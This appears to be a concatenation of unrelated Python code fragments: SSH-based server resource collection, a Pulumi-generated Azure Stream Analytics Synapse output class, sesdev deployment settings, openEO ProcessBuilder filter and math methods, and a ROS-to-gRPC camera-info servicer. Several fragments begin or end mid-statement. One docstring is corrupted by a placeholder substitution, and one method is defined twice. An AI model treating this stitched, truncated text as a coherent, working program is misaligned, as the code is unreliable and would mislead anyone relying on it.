unused_size = -1
else:
try:
results = os_output[0].split()
total_size = float(results[0])
unused_size = float(results[1])
except Exception as ex:
total_size = -1
unused_size = -1
Mu.log_warning(self.__logger, "Parsing SSH output failed in 'collect_disk_info' with error: {0}, "
"server: {1}, the output: {2}".format(ex, server_id, os_output))
self.__set_server_info(server_id, Mc.SERVER_INFO_DISK, total_size, unused_size)
def collect_mem_info(self, ssh, server_id, os):
""" get the overall memory information for system"""
if Mc.use_simulator_4_mem():
# use simulator if USE_SIMULATOR is True
mem_total, mem_free = OSSimulator.simulate_collect_mem_info()
else:
os_output = self.__get_dao(os).collect_mem_info(ssh)
if os_output is None:
Mu.log_warning(self.__logger, "Can not get memory info for server:{0}.".format(server_id))
mem_total = -1
mem_free = -1
else:
try:
results = os_output[0].split()
mem_total = int(results[0])
mem_free = int(results[1])
except Exception as ex:
mem_total = -1
mem_free = -1
Mu.log_warning(self.__logger, "Parsing SSH output failed in 'collect_mem_info' with error: {0}, "
"server: {1}, the output: {2}".format(ex, server_id, os_output))
self.__set_server_info(server_id, Mc.SERVER_INFO_MEM, mem_total, mem_free)
def collect_cpu_info(self, ssh, server_id, os):
""" get the overall CPU information for system"""
if Mc.use_simulator_4_cpu():
# use simulator if USE_SIMULATOR is True
cpu_number, cpu_usage = OSSimulator.simulate_collect_cpu_info()
else:
os_output_cpu_number, os_output_cpu_usage = self.__get_dao(os).collect_cpu_info(ssh)
# get cpu number
if os_output_cpu_number is None:
Mu.log_warning(self.__logger, "Can not get cpu number info for server:{0}.".format(server_id))
cpu_number = -1
else:
try:
cpu_number = int(os_output_cpu_number[0])
except Exception as ex:
cpu_number = -1
Mu.log_warning(self.__logger, "Parsing SSH output failed in 'collect_cpu_info(0)' "
"with error: {0}, server: {1}, "
"the output: {2}".format(ex, server_id, os_output_cpu_number))
# get cpu usage
if os_output_cpu_usage is None:
Mu.log_warning(self.__logger, "Can not get cpu usage info for server:{0}.".format(server_id))
cpu_usage = -1
else:
try:
cpu_usage = float(os_output_cpu_usage[0])
except Exception as ex:
cpu_usage = -1
Mu.log_warning(self.__logger, "Parsing SSH output failed in 'collect_cpu_info(1)' "
"with error: {0}, server: {1}, "
"the output: {2}".format(ex, server_id, os_output_cpu_usage))
self.__set_server_info(server_id, Mc.SERVER_INFO_CPU, cpu_number, cpu_usage)
def collect_os_info(self, ssh, server_id, os):
"""get os info, including os version and kernel version"""
os_output_os_version, os_output_os_kernel = self.__get_dao(os).collect_os_info(ssh)
# get os version
if os_output_os_version is None:
Mu.log_warning(self.__logger, "Can not OS release info for server:{0}, ".format(server_id))
os_version = ''
else:
try:
os_version = str(os_output_os_version[0]) \
| |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['OutputSynapseArgs', 'OutputSynapse']
@pulumi.input_type
class OutputSynapseArgs:
def __init__(__self__, *,
database: pulumi.Input[str],
password: pulumi.Input[str],
resource_group_name: pulumi.Input[str],
server: pulumi.Input[str],
stream_analytics_job_name: pulumi.Input[str],
table: pulumi.Input[str],
user: pulumi.Input[str],
name: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a OutputSynapse resource.
:param pulumi.Input[str] database: The name of the Azure SQL database. Changing this forces a new resource to be created.
:param pulumi.Input[str] password: The password that <PASSWORD> to connect to the Azure SQL database. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group where the Stream Analytics Job exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] server: The name of the SQL server containing the Azure SQL database. Changing this forces a new resource to be created.
:param pulumi.Input[str] stream_analytics_job_name: The name of the Stream Analytics Job. Changing this forces a new resource to be created.
:param pulumi.Input[str] table: The name of the table in the Azure SQL database. Changing this forces a new resource to be created.
:param pulumi.Input[str] user: The user name that will be used to connect to the Azure SQL database. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: The name of the Stream Output. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "database", database)
pulumi.set(__self__, "password", password)
pulumi.set(__self__, "resource_group_name", resource_group_name)
pulumi.set(__self__, "server", server)
pulumi.set(__self__, "stream_analytics_job_name", stream_analytics_job_name)
pulumi.set(__self__, "table", table)
pulumi.set(__self__, "user", user)
if name is not None:
pulumi.set(__self__, "name", name)
@property
@pulumi.getter
def database(self) -> pulumi.Input[str]:
"""
The name of the Azure SQL database. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "database")
@database.setter
def database(self, value: pulumi.Input[str]):
pulumi.set(self, "database", value)
@property
@pulumi.getter
def password(self) -> pulumi.Input[str]:
"""
The password that will be used to connect to the Azure SQL database. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: pulumi.Input[str]):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the Resource Group where the Stream Analytics Job exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter
def server(self) -> pulumi.Input[str]:
"""
The name of the SQL server containing the Azure SQL database. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "server")
@server.setter
def server(self, value: pulumi.Input[str]):
pulumi.set(self, "server", value)
@property
@pulumi.getter(name="streamAnalyticsJobName")
def stream_analytics_job_name(self) -> pulumi.Input[str]:
"""
The name of the Stream Analytics Job. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "stream_analytics_job_name")
@stream_analytics_job_name.setter
def stream_analytics_job_name(self, value: pulumi.Input[str]):
pulumi.set(self, "stream_analytics_job_name", value)
@property
@pulumi.getter
def table(self) -> pulumi.Input[str]:
"""
The name of the table in the Azure SQL database. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "table")
@table.setter
def table(self, value: pulumi.Input[str]):
pulumi.set(self, "table", value)
@property
@pulumi.getter
def user(self) -> pulumi.Input[str]:
"""
The user name that will be used to connect to the Azure SQL database. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "user")
@user.setter
def user(self, value: pulumi.Input[str]):
pulumi.set(self, "user", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the Stream Output. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@pulumi.input_type
class _OutputSynapseState:
def __init__(__self__, *,
database: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
password: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
server: Optional[pulumi.Input[str]] = None,
stream_analytics_job_name: Optional[pulumi.Input[str]] = None,
table: Optional[pulumi.Input[str]] = None,
user: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering OutputSynapse resources.
:param pulumi.Input[str] database: The name of the Azure SQL database. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: The name of the Stream Output. Changing this forces a new resource to be created.
:param pulumi.Input[str] password: The password that will be used to connect to the Azure SQL database. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group where the Stream Analytics Job exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] server: The name of the SQL server containing the Azure SQL database. Changing this forces a new resource to be created.
:param pulumi.Input[str] stream_analytics_job_name: The name of the Stream Analytics Job. Changing this forces a new resource to be created.
:param pulumi.Input[str] table: The name of the table in the Azure SQL database. Changing this forces a new resource to be created.
:param pulumi.Input[str] user: The user name that will be used to connect to the Azure SQL database. Changing this forces a new resource to be created.
"""
if database is not None:
pulumi.set(__self__, "database", database)
if name is not None:
pulumi.set(__self__, "name", name)
if password is not None:
pulumi.set(__self__, "password", password)
if resource_group_name is not None:
pulumi.set(__self__, "resource_group_name", resource_group_name)
if server is not None:
pulumi.set(__self__, "server", server)
if stream_analytics_job_name is not None:
pulumi.set(__self__, "stream_analytics_job_name", stream_analytics_job_name)
if table is not None:
pulumi.set(__self__, "table", table)
if user is not None:
pulumi.set(__self__, "user", user)
@property
@pulumi.getter
def database(self) -> Optional[pulumi.Input[str]]:
"""
The name of the Azure SQL database. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "database")
@database.setter
def database(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "database", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the Stream Output. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[str]]:
"""
The password that will be used to connect to the Azure SQL database. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the Resource Group where the Stream Analytics Job exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter
def server(self) -> Optional[pulumi.Input[str]]:
"""
The name of the SQL server containing the Azure SQL database. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "server")
@server.setter
def server(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "server", value)
@property
@pulumi.getter(name="streamAnalyticsJobName")
def stream_analytics_job_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the Stream Analytics Job. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "stream_analytics_job_name")
@stream_analytics_job_name.setter
def stream_analytics_job_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "stream_analytics_job_name", value)
@property
@pulumi.getter
def table(self) -> Optional[pulumi.Input[str]]:
"""
The name of the table in the Azure SQL database. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "table")
@table.setter
def table(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "table", value)
@property
@pulumi.getter
def user(self) -> Optional[pulumi.Input[str]]:
"""
The user name that will be used to connect to the Azure SQL database. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "user")
@user.setter
def user(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "user", value)
class OutputSynapse(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
database: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
password: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
server: Optional[pulumi.Input[str]] = None,
stream_analytics_job_name: Optional[pulumi.Input[str]] = None,
table: Optional[pulumi.Input[str]] = None,
user: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Manages a Stream Analytics Output to an Azure Synapse Analytics Workspace.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.get_resource_group(name="example-resources")
example_job = azure.streamanalytics.get_job(name="example-job",
resource_group_name=azurerm_resource_group["example"]["name"])
example_account = azure.storage.Account("exampleAccount",
resource_group_name=azurerm_resource_group["example"]["name"],
location=azurerm_resource_group["example"]["location"],
account_tier="Standard",
account_replication_type="LRS",
account_kind="StorageV2",
is_hns_enabled=True)
example_data_lake_gen2_filesystem = azure.storage.DataLakeGen2Filesystem("exampleDataLakeGen2Filesystem", storage_account_id=example_account.id)
example_workspace = azure.synapse.Workspace("exampleWorkspace",
resource_group_name=azurerm_resource_group["example"]["name"],
location=azurerm_resource_group["example"]["location"],
storage_data_lake_gen2_filesystem_id=example_data_lake_gen2_filesystem.id,
sql_administrator_login="sqladminuser",
sql_administrator_login_password="<PASSWORD>!")
example_output_synapse = azure.streamanalytics.OutputSynapse("exampleOutputSynapse",
stream_analytics_job_name=azurerm_stream_analytics_job["example"]["name"],
resource_group_name=azurerm_stream_analytics_job["example"]["resource_group_name"],
server=azurerm_synapse_workspace["test"]["connectivity_endpoints"]["sqlOnDemand"],
| |
import json
import os
import yaml
from .constant import Constant
from .exceptions import \
SettingNotKnown, \
SettingTypeError
from .log import Log
SETTINGS = {
# RESERVED KEY, DO NOT USE: 'strict'
'apparmor': {
'type': bool,
'help': 'Enable/disable AppArmor',
'default': True,
},
'caasp_deploy_ses': {
'type': bool,
'help': 'Deploy SES using rook in CaasP',
'default': False,
},
'ceph_salt_git_repo': {
'type': str,
'help': 'If set, it will install ceph-salt from this git repo',
'default': '',
},
'ceph_salt_git_branch': {
'type': str,
'help': 'ceph-salt git branch to use',
'default': '',
},
'cluster_network': {
'type': str,
'help': 'The network address prefix for the cluster network',
'default': '',
},
'container_registry': {
'type': dict,
'help': 'Container registry data [prefix, location, insecure]',
'default': None,
},
'cpus': {
'type': int,
'help': 'Number of virtual CPUs in each node',
'default': 2,
},
'custom_repos': {
'type': list,
'help': 'Optional custom zypper repos to apply to all nodes',
'default': [],
},
'deepsea_git_repo': {
'type': str,
'help': 'If set, it will install DeepSea from this git repo',
'default': '',
},
'deepsea_git_branch': {
'type': str,
'help': 'Git branch to use',
'default': 'master',
},
'deployment_tool': {
'type': str,
'help': 'Deployment tool (deepsea, cephadm) to deploy the Ceph cluster',
'default': '',
},
'devel_repo': {
'type': bool,
'help': 'Include "devel" zypper repo, if applicable',
'default': True,
},
'developer_tools_repos': {
'type': dict,
'help': 'Developer Tools Module repos for various versions of SLE',
'default': Constant.DEVELOPER_TOOLS_REPOS,
},
'disk_size': {
'type': int,
'help': 'Storage disk size in gigabytes',
'default': 8,
},
'domain': {
'type': str,
'help': 'The domain name for nodes',
'default': '{}.test',
},
'dry_run': {
'type': bool,
'help': 'Dry run (do not deploy any VMs)',
'default': False,
},
'encrypted_osds': {
'type': bool,
'help': 'Whether OSDs should be deployed encrypted',
'default': False,
},
'explicit_cpus': {
'type': bool,
'help': 'Whether --cpus was given on the command line',
'default': False,
},
'explicit_num_disks': {
'type': bool,
'help': 'Whether --num-disks was given on the command line',
'default': False,
},
'explicit_ram': {
'type': bool,
'help': 'Whether --ram was given on the command line',
'default': False,
},
'fqdn': {
'type': bool,
'help': 'Whether \'hostname\' command returns FQDN or short hostname',
'default': False,
},
'filestore_osds': {
'type': bool,
'help': 'Whether OSDs should be deployed with FileStore instead of BlueStore',
'default': False,
},
'image_path': {
'type': str,
'help': 'Container image path for Ceph daemons',
'default': '',
},
'image_paths_devel': {
'type': dict,
'help': 'paths to devel container images',
'default': Constant.IMAGE_PATHS_DEVEL,
},
'image_paths_product': {
'type': dict,
'help': 'paths to product container images',
'default': Constant.IMAGE_PATHS_PRODUCT,
},
'internal_media_repos': {
'type': dict,
'help': 'Internal Media repos for various versions of SES',
'default': Constant.INTERNAL_MEDIA_REPOS,
},
'ipv6': {
'type': bool,
'help': 'Configure IPv6 addresses. This option requires "Accept Router '
'Advertisements" to be set to 2. You can change it by running '
'"sysctl -w net.ipv6.conf.<if>.accept_ra=2" where '
'<if> is the network interface used by libvirt for network '
'forwarding, or "all" to apply to all interfaces.',
'default': False
},
'libvirt_host': {
'type': str,
'help': 'Hostname/IP address of the libvirt host',
'default': '',
},
'libvirt_networks': {
'type': str,
'help': 'Existing libvirt networks to use (single or comma separated list)',
'default': '',
},
'libvirt_private_key_file': {
'type': str,
'help': 'Path to SSH private key file to use when connecting to the libvirt host',
'default': '',
},
'libvirt_storage_pool': {
'type': str,
'help': 'The libvirt storage pool to use for creating VMs',
'default': '',
},
'libvirt_use_ssh': {
'type': bool,
'help': 'Flag to control the use of SSH when connecting to the libvirt host',
'default': None,
},
'libvirt_user': {
'type': str,
'help': 'Username to use to login into the libvirt host',
'default': '',
},
'makecheck_ceph_branch': {
'type': str,
'help': 'Branch to check out for purposes of running "make check"',
'default': '',
},
'makecheck_ceph_repo': {
'type': str,
'help': 'Repo from which to clone Ceph source code',
'default': '',
},
'makecheck_stop_before_git_clone': {
'type': bool,
'help': 'Stop before cloning the git repo (make check)',
'default': False,
},
'makecheck_stop_before_install_deps': {
'type': bool,
'help': 'Stop before running install-deps.sh (make check)',
'default': False,
},
'makecheck_stop_before_run_make_check': {
'type': bool,
'help': 'Stop before running run-make-check.sh (make check)',
'default': False,
},
'makecheck_username': {
'type': str,
'help': 'Name of ordinary user that will run make check',
'default': 'sesdev',
},
'non_interactive': {
'type': bool,
'help': 'Whether the user wants to be asked',
'default': False,
},
'num_disks': {
'type': int,
'help': 'Number of additional disks in storage nodes',
'default': 2,
},
'os': {
'type': str,
'help': 'openSUSE OS version (leap-15.1, tumbleweed, sles-12-sp3, or sles-15-sp1)',
'default': '',
},
'os_makecheck_repos': {
'type': dict,
'help': 'repos to add to VMs in "makecheck" environments',
'default': Constant.OS_MAKECHECK_REPOS,
},
'os_box': {
'type': dict,
'help': 'vagrant box to be used for a given operating system (os)',
'default': Constant.OS_BOX_MAPPING,
},
'os_ca_repo': {
'type': dict,
'help': 'ca repo to add on all VMs of a given operating system (os)',
'default': Constant.OS_CA_REPO,
},
'os_repos': {
'type': dict,
'help': 'repos to add on all VMs of a given operating system (os)',
'default': Constant.OS_REPOS,
},
'provision': {
'type': bool,
'help': 'Whether to provision the VMs (e.g., deploy Ceph on them) after they are created',
'default': True,
},
'public_network': {
'type': str,
'help': 'The network address prefix for the public network',
'default': '',
},
'qa_test': {
'type': bool,
'help': 'Automatically run integration tests on the deployed cluster',
'default': False,
},
'ram': {
'type': int,
'help': 'RAM size in gigabytes for each node',
'default': 4,
},
'repo_priority': {
'type': bool,
'help': 'One or more zypper repos will have elevated priority',
'default': True,
},
'repos': {
'type': list,
'help': 'DEPRECATED: use custom_repos instead',
'default': [],
},
'rgw_ssl': {
'type': bool,
'help': 'Whether to deploy RGW with SSL enabled',
'default': False,
},
'roles': {
'type': list,
'help': 'Roles to apply to the current deployment',
'default': [],
},
'scc_password': {
'type': str,
'help': 'SCC organization password',
'default': '',
},
'scc_username': {
'type': str,
'help': 'SCC organization username',
'default': '',
},
'single_node': {
'type': bool,
'help': 'Whether --single-node was given on the command line',
'default': False,
},
'ssd': {
'type': bool,
'help': 'Makes one of the additional disks be non-rotational',
'default': False,
},
'stop_before_ceph_orch_apply': {
'type': bool,
'help': 'Stops deployment before ceph orch apply',
'default': False,
},
'stop_before_ceph_salt_apply': {
'type': bool,
'help': 'Stops deployment before ceph-salt apply',
'default': False,
},
'stop_before_cephadm_bootstrap': {
'type': bool,
'help': 'Stops deployment before cephadm bootstrap',
'default': False,
},
'stop_before_ceph_salt_config': {
'type': bool,
'help': 'Stops deployment before ceph-salt config',
'default': False,
},
'stop_before_stage': {
'type': int,
'help': 'Stop deployment before running the specified DeepSea stage',
'default': None,
},
'synced_folder': {
'type': list,
'help': 'Sync Folders to VM',
'default': [],
},
'use_salt': {
'type': bool,
'help': 'Use "salt" (or "salt-run") to apply Salt Formula (or execute DeepSea Stages)',
'default': False,
},
'version': {
'type': str,
'help': 'Deployment version to install ("nautilus", "ses6", "caasp4", etc.)',
'default': 'nautilus',
},
'version_default_roles': {
'type': dict,
'help': 'Default roles for each node - one set of default roles per deployment version',
'default': Constant.ROLES_DEFAULT_BY_VERSION,
},
'version_devel_repos': {
'type': dict,
'help': 'the "devel repo", whatever that means on a particular VERSION:OS combination',
'default': Constant.VERSION_DEVEL_REPOS,
},
'version_os_repo_mapping': {
'type': dict,
'help': 'DEPRECATED: additional repos to be added on particular VERSION:OS combinations',
'default': Constant.VERSION_DEVEL_REPOS,
},
'vm_engine': {
'type': str,
'help': 'VM engine to use for VM deployment. Current options [libvirt]',
'default': 'libvirt',
},
'msgr2_secure_mode': {
'type': bool,
'help': 'Set "ms_*_mode" options to "secure"',
'default': False,
},
'msgr2_prefer_secure': {
'type': bool,
'help': 'Prioritise secure mode over "crc" in the ms_*_mode options.',
'default': False,
},
}
class Settings():
# pylint: disable=no-member
def __init__(self, strict=True, **kwargs):
self.strict = strict
config = self._load_config_file()
self._apply_settings(config)
self._apply_settings(kwargs)
for k, v in SETTINGS.items():
if k not in kwargs and k not in config:
Log.debug("Setting {} to default value ->{}<-"
.format(k, v['default']))
setattr(self, k, v['default'])
def override(self, setting, new_value):
if setting not in SETTINGS:
raise SettingNotKnown(setting)
Log.debug("Overriding setting '{}', old value: {}"
.format(setting, getattr(self, setting)))
Log.debug("Overriding setting '{}', new value: {}"
.format(setting, new_value))
setattr(self, setting, new_value)
def _apply_settings(self, settings_dict):
for k, v in settings_dict.items():
| |
consisting of two elements. The first
element is the minimum wavelength and the second element is the maximum wavelength. Wavelengths are
specified in micrometers (μm). The order of the specified array defines the order of the bands in the
data cube. If multiple bands match the wavelengths, all matched bands are included in the original
order.
:return: A data cube limited to a subset of its original bands. The dimensions and dimension properties
(name, type, labels, reference system and resolution) remain unchanged, except that the dimension of
type `bands` has less (or the same) dimension labels.
"""
return filter_bands(data=self, bands=bands, wavelengths=wavelengths)
def filter_bbox(self, extent) -> 'ProcessBuilder':
"""
Spatial filter using a bounding box
:param self: A data cube.
:param extent: A bounding box, which may include a vertical axis (see `base` and `height`).
:return: A data cube restricted to the bounding box. The dimensions and dimension properties (name,
type, labels, reference system and resolution) remain unchanged, except that the spatial dimensions
have less (or the same) dimension labels.
"""
return filter_bbox(data=self, extent=extent)
def filter_labels(self, condition, dimension, context=UNSET) -> 'ProcessBuilder':
"""
Filter dimension labels based on a condition
:param self: A data cube.
:param condition: A condition that is evaluated against each dimension label in the specified
dimension. A dimension label and the corresponding data is preserved for the given dimension, if the
condition returns `true`.
:param dimension: The name of the dimension to filter on. Fails with a `DimensionNotAvailable` error if
the specified dimension does not exist.
:param context: Additional data to be passed to the condition.
:return: A data cube with the same dimensions. The dimension properties (name, type, labels, reference
system and resolution) remain unchanged, except that the given dimension has less (or the same)
dimension labels.
"""
return filter_labels(data=self, condition=condition, dimension=dimension, context=context)
def filter_labels(self, condition, dimension, context=UNSET) -> 'ProcessBuilder':
"""
Filter dimension labels based on a condition
:param self: A data cube.
:param condition: A condition that is evaluated against each dimension label in the specified
dimension. A dimension label and the corresponding data is preserved for the given dimension, if the
condition returns `true`.
:param dimension: The name of the dimension to filter on. Fails with a `DimensionNotAvailable`
exception if the specified dimension does not exist.
:param context: Additional data to be passed to the condition.
:return: A data cube with the same dimensions. The dimension properties (name, type, labels, reference
system and resolution) remain unchanged, except that the given dimension has less (or the same)
dimension labels.
"""
return filter_labels(data=self, condition=condition, dimension=dimension, context=context)
def filter_spatial(self, geometries) -> 'ProcessBuilder':
"""
Spatial filter using geometries
:param self: A data cube.
:param geometries: One or more geometries used for filtering, specified as GeoJSON.
:return: A data cube restricted to the specified geometries. The dimensions and dimension properties
(name, type, labels, reference system and resolution) remain unchanged, except that the spatial
dimensions have less (or the same) dimension labels.
"""
return filter_spatial(data=self, geometries=geometries)
def filter_temporal(self, extent, dimension=UNSET) -> 'ProcessBuilder':
"""
Temporal filter for a temporal intervals
:param self: A data cube.
:param extent: Left-closed temporal interval, i.e. an array with exactly two elements: 1. The first
element is the start of the temporal interval. The specified instance in time is **included** in the
interval. 2. The second element is the end of the temporal interval. The specified instance in time is
**excluded** from the interval. The specified temporal strings follow [RFC 3339](https://www.rfc-
editor.org/rfc/rfc3339.html). Also supports open intervals by setting one of the boundaries to `null`,
but never both.
:param dimension: The name of the temporal dimension to filter on. If no specific dimension is
specified or it is set to `null`, the filter applies to all temporal dimensions. Fails with a
`DimensionNotAvailable` exception if the specified dimension does not exist.
:return: A data cube restricted to the specified temporal extent. The dimensions and dimension
properties (name, type, labels, reference system and resolution) remain unchanged, except that the
temporal dimensions (determined by `dimensions` parameter) may have less dimension labels.
"""
return filter_temporal(data=self, extent=extent, dimension=dimension)
def first(self, ignore_nodata=UNSET) -> 'ProcessBuilder':
"""
First element
:param self: An array with elements of any data type.
:param ignore_nodata: Indicates whether no-data values are ignored or not. Ignores them by default.
Setting this flag to `false` considers no-data values so that `null` is returned if the first value is
such a value.
:return: The first element of the input array.
"""
return first(data=self, ignore_nodata=ignore_nodata)
def floor(self) -> 'ProcessBuilder':
"""
Round fractions down
:param self: A number to round down.
:return: The number rounded down.
"""
return floor(x=self)
def gt(self, y) -> 'ProcessBuilder':
"""
Greater than comparison
:param self: First operand.
:param y: Second operand.
:return: `true` if `x` is strictly greater than `y` or `null` if any operand is `null`, otherwise
`false`.
"""
return gt(x=self, y=y)
def gte(self, y) -> 'ProcessBuilder':
"""
Greater than or equal to comparison
:param self: First operand.
:param y: Second operand.
:return: `true` if `x` is greater than or equal to `y`, `null` if any operand is `null`, otherwise
`false`.
"""
return gte(x=self, y=y)
def if_(self, accept, reject=UNSET) -> 'ProcessBuilder':
"""
If-Then-Else conditional
:param self: A boolean value.
:param accept: A value that is returned if the boolean value is `true`.
:param reject: A value that is returned if the boolean value is **not** `true`. Defaults to `null`.
:return: Either the `accept` or `reject` argument depending on the given boolean value.
"""
return if_(value=self, accept=accept, reject=reject)
def int(self) -> 'ProcessBuilder':
"""
Integer part of a number
:param self: A number.
:return: Integer part of the number.
"""
return int(x=self)
def is_infinite(self) -> 'ProcessBuilder':
"""
Value is an infinite number
:param self: The data to check.
:return: `true` if the data is an infinite number, otherwise `false`.
"""
return is_infinite(x=self)
def is_nan(self) -> 'ProcessBuilder':
"""
Value is not a number
:param self: The data to check.
:return: `true` if the data is not a number, otherwise `false`.
"""
return is_nan(x=self)
def is_nodata(self) -> 'ProcessBuilder':
"""
Value is not a no-data value
:param self: The data to check.
:return: `true` if the data is a no-data value, otherwise `false`.
"""
return is_nodata(x=self)
def is_valid(self) -> 'ProcessBuilder':
"""
Value is valid data
:param self: The data to check.
:return: `true` if the data is valid, otherwise `false`.
"""
return is_valid(x=self)
def last(self, ignore_nodata=UNSET) -> 'ProcessBuilder':
"""
Last element
:param self: An array with elements of any data type.
:param ignore_nodata: Indicates whether no-data values are ignored or not. Ignores them by default.
Setting this flag to `false` considers no-data values so that `null` is returned if the last value is
such a value.
:return: The last element of the input array.
"""
return last(data=self, ignore_nodata=ignore_nodata)
def linear_scale_range(self, inputMin, inputMax, outputMin=UNSET, outputMax=UNSET) -> 'ProcessBuilder':
"""
Linear transformation between two ranges
:param self: A number to transform. The number gets clipped to the bounds specified in `inputMin` and
`inputMax`.
:param inputMin: Minimum value the input can obtain.
:param inputMax: Maximum value the input can obtain.
:param outputMin: Minimum value of the desired output range.
:param outputMax: Maximum value of the desired output range.
:return: The transformed number.
"""
return linear_scale_range(x=self, inputMin=inputMin, inputMax=inputMax, outputMin=outputMin, outputMax=outputMax)
def ln(self) -> 'ProcessBuilder':
"""
Natural logarithm
:param self: A number to compute the natural logarithm for.
:return: The computed natural logarithm.
"""
return ln(x=self)
def load_collection(self, spatial_extent, temporal_extent, bands=UNSET, properties=UNSET) -> 'ProcessBuilder':
"""
Load a collection
:param self: The collection id.
:param spatial_extent: Limits the data to load from the collection to the specified bounding box or
polygons. The process puts a pixel into the data cube if the point at the pixel center intersects with
the bounding box or any of the polygons (as defined in the Simple Features standard by the OGC). The
GeoJSON can be one of | |
ros_msg.topics:
pb_msg.topics.append(ros_msg_)
yield pb_msg
rospy.sleep(0.01)
class usb_cam_camera_infoServicer(ros_grpc.usb_cam_camera_infoServicer):
def __init__(self):
self.pub = None
self.Msg = roslib.message.get_message_class('sensor_msgs/CameraInfo')
def Publish(self, pb_msg, context):
if self.pub == None:
self.pub = rospy.Publisher('/usb_cam/camera_info', self.Msg, queue_size=10)
ros_msg = self.Msg()
ros_msg.header.seq = pb_msg.header.seq
ros_msg.header.stamp.secs = pb_msg.header.stamp.secs
ros_msg.header.stamp.nsecs = pb_msg.header.stamp.nsecs
ros_msg.header.frame_id = pb_msg.header.frame_id
ros_msg.height = pb_msg.height
ros_msg.width = pb_msg.width
ros_msg.distortion_model = pb_msg.distortion_model
for pb_msg_ in pb_msg.D:
ros_msg.D.append(pb_msg_)
for pb_msg_ in pb_msg.K:
ros_msg.K.append(pb_msg_)
for pb_msg_ in pb_msg.R:
ros_msg.R.append(pb_msg_)
for pb_msg_ in pb_msg.P:
ros_msg.P.append(pb_msg_)
ros_msg.binning_x = pb_msg.binning_x
ros_msg.binning_y = pb_msg.binning_y
ros_msg.roi.x_offset = pb_msg.roi.x_offset
ros_msg.roi.y_offset = pb_msg.roi.y_offset
ros_msg.roi.height = pb_msg.roi.height
ros_msg.roi.width = pb_msg.roi.width
ros_msg.roi.do_rectify = pb_msg.roi.do_rectify
self.pub.publish(ros_msg)
return ros_pb.Empty()
def Subscribe(self, request, context):
c = {'unsubscribed': False}
ros_messages = []
def callback(ros_msg):
ros_messages.append(ros_msg)
subscription = rospy.Subscriber('/usb_cam/camera_info', self.Msg, callback)
def on_rpc_done():
c['unsubscribed'] = True
print("Attempting to regain servicer thread...", c)
subscription.unregister()
context.add_callback(on_rpc_done)
while not c['unsubscribed']:
while ros_messages:
ros_msg = ros_messages.pop(0)
pb_msg = ros_pb.sensor_msgs.CameraInfo()
pb_msg.header.seq = ros_msg.header.seq
pb_msg.header.stamp.secs = ros_msg.header.stamp.secs
pb_msg.header.stamp.nsecs = ros_msg.header.stamp.nsecs
pb_msg.header.frame_id = ros_msg.header.frame_id
pb_msg.height = ros_msg.height
pb_msg.width = ros_msg.width
pb_msg.distortion_model = ros_msg.distortion_model
for ros_msg_ in ros_msg.D:
pb_msg.D.append(ros_msg_)
for ros_msg_ in ros_msg.K:
pb_msg.K.append(ros_msg_)
for ros_msg_ in ros_msg.R:
